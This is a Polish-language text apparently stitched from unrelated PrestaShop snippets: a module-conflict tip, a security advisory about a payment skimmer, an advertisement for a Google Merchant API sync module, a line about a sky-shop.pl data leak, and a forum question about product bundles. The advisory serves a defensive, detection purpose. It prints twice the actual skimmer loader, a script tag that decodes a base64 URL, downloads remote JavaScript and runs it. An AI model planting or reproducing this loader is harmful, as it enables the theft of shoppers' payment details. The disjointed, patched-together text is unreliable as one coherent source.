Widać ewidentnie, że gryzą się 2 moduły - przelewy24 i dyspozytornia [z jakiegoś nadpisania, modułu] Zacznij od zlokalizowania funkcji "dyspozytornia" i tymczasowo wyłącz nadpisanie / moduł.

Niedawno zidentyfikowaliśmy zagrożenie bezpieczeństwa wpływające na niektóre sklepy internetowe w ekosystemie PrestaShop. Wykryto złośliwy skrypt („cyfrowy skimmer”), który mógł spowodować kradzież niektórych informacji o płatnościach Twoich klientów.

Do czego robi ten cyfrowy skimmer?

To złośliwe oprogramowanie działa poprzez zastąpienie legalnych przycisków płatności na stronie kasy fałszywymi przyciskami. Gdy klient kliknie jeden z tych fałszywych przycisków, zostanie przekierowany do fałszywego formularza płatności zaprojektowanego w celu przechwycenia informacji o płatności.

Skimmer jest po prostu ładowany za pomocą tagu <script>, zapisanego bezpośrednio do pliku _partials/head.tpl aktywnego motywu sklepu. Oznacza to, że atakujący był w stanie zmodyfikować jeden z plików sklepu.

Jak mogę sprawdzić, czy mój sklep jest dotknięty?

W recepcji

Możesz sprawdzić swój kod front office, sprawdzając stronę swojej witryny (kliknij prawym przyciskiem myszy, a następnie "sprawdz").

Zajrzyj do wnętrza tagu <script>. Jeśli znajdziesz następujący kod, oznacza to, że Twój sklep jest dotknięty:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Uwaga: Część aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz zmienia się za każdym razem, ale struktura kodu pozostaje taka sama, a funkcja atob() jest zawsze używana. Kod może być obecny przed lub po (skimmer próbuje się ukryć, ponieważ jest nieco inny w każdym sklepie).

Na twoim serwerze

Jeśli wolisz sprawdzać swoje pliki, możesz znaleźć ten sam tag skryptu w pliku na swoim serwerze.

Połącz się z serwerem przez FTP, a następnie przejdź przez folder motywu, a następnie folder aktywnego motywu > folder szablonu > folder _partial > head.tpl. W tym pliku kliknij prawym przyciskiem myszy, a następnie "wyświetl/edytuj" i poszukaj tego samego tagu:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Co powinienem zrobić, jeśli mój sklep jest dotknięty?

Skontaktuj się ze swoją agencją lub wsparciem PrestaShop.

⚠️ Na tym etapie zdecydowanie zalecamy przeprowadzenie pełnej kontroli bezpieczeństwa sklepów PrestaShop i upewnienie się, że żaden z nich nie został naruszony.

Moduł Google Merchant API dla PrestaShop. Automatyczna synchronizacja produktów z Google Shopping, obsługa multi-shop, zarządzanie stanami magazynowymi, cron job, panel administracyjny do zarządzania wszystkimi parametrami synchronizacji. Użytkownicy interfejsu API muszą przejść na Merchant API.
Główne funkcjonalności
Automatyczna synchronizacja produktów
Moduł automatycznie synchronizuje wszystkie produkty z PrestaShop do Google Merchant Center. Każda zmiana produktu - aktualizacja ceny, tytułu, opisu, zdjęć czy stanu magazynowego - jest natychmiast przekazywana do Google. System obsługuje zarówno proste produkty, jak i produkty z kombinacjami (warianty kolorów, rozmiarów, materiałów).

Dwukierunkowa autoryzacja
Wybierz metodę uwierzytelniania dostosowaną do Twoich potrzeb. OAuth 2.0 umożliwia szybką autoryzację przez przeglądarkę z automatycznym odświeżaniem tokenów. Service Account zapewnia bezobsługową integrację idealną dla automatyzacji. Obie metody gwarantują bezpieczne połączenie z Google Cloud.

Zarządzanie stanami magazynowymi
System automatycznie aktualizuje dostępność produktów w Google Shopping. Gdy stan magazynowy się zmienia, informacja trafia natychmiast do Google Merchant API. Obsługiwane statusy: dostępny w magazynie, dostępny na zamówienie, niedostępny. Synchronizacja obejmuje również ceny regularne i promocyjne.

Panel administracyjny
Intuicyjny interfejs w back office PrestaShop umożliwia pełną kontrolę nad synchronizacją. Dashboard pokazuje statystyki aktywnych produktów, błędów i oczekujących synchronizacji. Możliwość ręcznego uruchamiania synchronizacji dla wybranych produktów lub wszystkich naraz. Import produktów z PrestaShop jednym kliknięciem.

System logów
Kompleksowy system rejestrowania wszystkich operacji synchronizacji. Każda operacja jest zapisywana z dokładnymi informacjami o statusie, liczbie przetworzonych produktów i ewentualnych błędach. Historia logów pozwala na szybką diagnostykę problemów. Możliwość eksportu logów do pliku CSV oraz automatyczne czyszczenie starych wpisów.

Automatyzacja przez Cron
Skonfiguruj harmonogram automatycznej synchronizacji dostosowany do potrzeb sklepu. System przetwarza produkty oczekujące w kolejce zgodnie z ustawioną częstotliwością: co 15 minut, godzinę, 2 godziny, 6 godzin lub raz dziennie. Cron job działa w tle, nie obciążając sklepu podczas godzin szczytu.

Obsługa Multi-shop
Pełna kompatybilność z funkcją multi-shop PrestaShop. Każdy sklep może mieć osobną konfigurację z własnym kontem Google Merchant Center lub współdzielić jedno konto. Produkty są synchronizowane osobno dla każdego sklepu z zachowaniem różnic w cenach i stanach magazynowych. Łatwe przełączanie między kontekstami sklepów.

Obsługa Multi-język
Synchronizacja produktów we wszystkich aktywnych językach sklepu. Każdy język tworzy osobny wpis produktu w Google z właściwym tłumaczeniem nazwy, opisu i linku. Dzięki temu Twoje produkty są widoczne w Google Shopping dla klientów mówiących różnymi językami. Automatyczne generowanie odpowiednich URL dla każdej wersji językowej.

Mapowanie pól produktu
Wszystkie wymagane pola Google Product są automatycznie wypełniane danymi z PrestaShop. System mapuje tytuł, opis, link, zdjęcia główne i dodatkowe (do 10), cenę, cenę promocyjną, dostępność, GTIN, MPN, markę, stan produktu, wagę, kategorie Google i własne typy produktów. Inteligentne wykrywanie kategorii i automatyczne przypisywanie taxonomii Google.

Warianty produktów
Pełna obsługa kombinacji produktów PrestaShop jako warianty Google. System automatycznie grupuje warianty używając item_group_id i przypisuje atrybuty takie jak kolor, rozmiar, materiał. Każda kombinacja jest synchronizowana jako osobny produkt w Google z właściwym SKU, ceną i dostępnością. Zdjęcia wariantów są prawidłowo mapowane.

Promocje i ceny specjalne
Automatyczna synchronizacja cen promocyjnych z PrestaShop. Gdy produkt ma aktywną promocję, system wysyła do Google zarówno cenę regularną jak i obniżoną wraz z datą zakończenia promocji. Google Shopping wyświetla przekreślone ceny pokazując oszczędności dla klientów. Zwiększ konwersję dzięki widocznym zniżkom.
https://europasaz.pl/marketing-reklama/154-merchant-api-google-prestashop.html

Doszło do wycieku danych z platformy sky-shop.pl, z której korzystają tysiące sklepów. W efekcie dane z 9000 sklepów trafiły w niepowołane ręce.

Dzień dobry,
Czy jest możliwość stworzenia pakietu promocyjnego  złożonego z 3 produktów. Każdy produkt przeznaczony do tego pakietu  jest produktem z kombinacjami (rozmiary).
Z tego co widzę to mogę utworzyć pakiet  "na sztywno" czyli każdy z produktów ma już wybrany rozmiar, ale w ten sposób tworzy się zbyt dużo opcji pakietu.
Czy może istnieje jakiś moduł, który umożliwi stworzenie takich pakietów?